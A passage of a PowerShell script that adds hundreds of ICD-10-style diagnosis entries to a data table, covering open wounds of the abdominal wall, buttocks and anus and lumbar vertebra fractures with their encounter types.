abdominal wall, left upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Puncture wound without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Puncture wound with foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, right upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, right upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, right upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, left upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, left upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, left upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, epigastric region with penetration into peritoneal cavity","Open bite of abdominal wall, epigastric region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, epigastric region with penetration into peritoneal cavity","Open bite of abdominal wall, epigastric region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, epigastric region with penetration into peritoneal cavity","Open bite of abdominal wall, epigastric region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, right lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, right lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, right lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, left lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, left lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, left lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, periumbilic region with penetration into peritoneal cavity","Open bite of abdominal wall, periumbilic region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, periumbilic region with penetration into peritoneal cavity","Open bite of abdominal wall, periumbilic region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, periumbilic region with penetration into peritoneal cavity","Open bite of abdominal wall, periumbilic region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Open bite of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified buttock","Laceration without foreign body of unspecified buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified buttock","Laceration without foreign body of unspecified buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified buttock","Laceration without foreign body of unspecified buttock, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified buttock","Laceration with foreign body of unspecified buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified buttock","Laceration with foreign body of unspecified buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified buttock","Laceration with foreign body of unspecified buttock, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified buttock","Puncture wound without foreign body of unspecified buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified buttock","Puncture wound without foreign body of unspecified buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified buttock","Puncture wound without foreign body of unspecified buttock, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified buttock","Puncture wound with foreign body of unspecified buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified buttock","Puncture wound with foreign body of unspecified buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified buttock","Puncture wound with foreign body of unspecified buttock, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified buttock","Open bite of unspecified buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified buttock","Open bite of unspecified buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified buttock","Open bite of unspecified buttock, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified buttock","Unspecified open wound of unspecified buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified buttock","Unspecified open wound of unspecified buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified buttock","Unspecified open wound of unspecified buttock, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right buttock","Laceration without foreign body of right buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right buttock","Laceration without foreign body of right buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right buttock","Laceration without foreign body of right buttock, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right buttock","Laceration with foreign body of right buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right buttock","Laceration with foreign body of right buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right buttock","Laceration with foreign body of right buttock, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right buttock","Puncture wound without foreign body of right buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right buttock","Puncture wound without foreign body of right buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right buttock","Puncture wound without foreign body of right buttock, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right buttock","Puncture wound with foreign body of right buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right buttock","Puncture wound with foreign body of right buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right buttock","Puncture wound with foreign body of right buttock, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right buttock","Open bite of right buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right buttock","Open bite of right buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right buttock","Open bite of right buttock, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right buttock","Unspecified open wound of right buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right buttock","Unspecified open wound of right buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right buttock","Unspecified open wound of right buttock, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left buttock","Laceration without foreign body of left buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left buttock","Laceration without foreign body of left buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left buttock","Laceration without foreign body of left buttock, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left buttock","Laceration with foreign body of left buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left buttock","Laceration with foreign body of left buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left buttock","Laceration with foreign body of left buttock, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left buttock","Puncture wound without foreign body of left buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left buttock","Puncture wound without foreign body of left buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left buttock","Puncture wound without foreign body of left buttock, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left buttock","Puncture wound with foreign body of left buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left buttock","Puncture wound with foreign body of left buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left buttock","Puncture wound with foreign body of left buttock, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left buttock","Open bite of left buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left buttock","Open bite of left buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left buttock","Open bite of left buttock, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left buttock","Unspecified open wound of left buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left buttock","Unspecified open wound of left buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left buttock","Unspecified open wound of left buttock, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of anus","Laceration without foreign body of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of anus","Laceration without foreign body of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of anus","Laceration without foreign body of anus, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of anus","Laceration with foreign body of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of anus","Laceration with foreign body of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of anus","Laceration with foreign body of anus, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of anus","Puncture wound without foreign body of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of anus","Puncture wound without foreign body of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of anus","Puncture wound without foreign body of anus, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of anus","Puncture wound with foreign body of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of anus","Puncture wound with foreign body of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of anus","Puncture wound with foreign body of anus, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of anus","Open bite of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of anus","Open bite of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of anus","Open bite of anus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of anus","Unspecified open wound of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of anus","Unspecified open wound of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of anus","Unspecified open wound of anus, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified lumbar vertebra","Wedge compression fracture of unspecified lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified lumbar vertebra","Wedge compression fracture of unspecified lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified lumbar vertebra","Wedge compression fracture of unspecified lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified lumbar vertebra","Wedge compression fracture of unspecified lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified lumbar vertebra","Wedge compression fracture of unspecified lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified lumbar vertebra","Wedge compression fracture of unspecified lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified lumbar vertebra","Stable burst fracture of unspecified lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified lumbar vertebra","Stable burst fracture of unspecified lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified lumbar vertebra","Stable burst fracture of unspecified lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified lumbar vertebra","Stable burst fracture of unspecified lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified lumbar vertebra","Stable burst fracture of unspecified lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified lumbar vertebra","Stable burst fracture of unspecified lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified lumbar vertebra","Unstable burst fracture of unspecified lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified lumbar vertebra","Unstable burst fracture of unspecified lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified lumbar vertebra","Unstable burst fracture of unspecified lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified lumbar vertebra","Unstable burst fracture of unspecified lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified lumbar vertebra","Unstable burst fracture of unspecified lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified lumbar vertebra","Unstable burst fracture of unspecified lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lumbar vertebra","Other fracture of unspecified lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lumbar vertebra","Other fracture of unspecified lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lumbar vertebra","Other fracture of unspecified lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lumbar vertebra","Other fracture of unspecified lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lumbar vertebra","Other fracture of unspecified lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lumbar vertebra","Other fracture of unspecified lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lumbar vertebra","Unspecified fracture of unspecified lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lumbar vertebra","Unspecified fracture of unspecified lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lumbar vertebra","Unspecified fracture of unspecified lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lumbar vertebra","Unspecified fracture of unspecified lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lumbar vertebra","Unspecified fracture of unspecified lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lumbar vertebra","Unspecified fracture of unspecified lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first lumbar vertebra","Wedge compression fracture of first lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first lumbar vertebra","Wedge compression fracture of first lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first lumbar vertebra","Wedge compression fracture of first lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first lumbar vertebra","Wedge compression fracture of first lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first lumbar vertebra","Wedge compression fracture of first lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first lumbar vertebra","Wedge compression fracture of first lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first lumbar vertebra","Stable burst fracture of first lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first lumbar vertebra","Stable burst fracture of first lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first lumbar vertebra","Stable burst fracture of first lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = 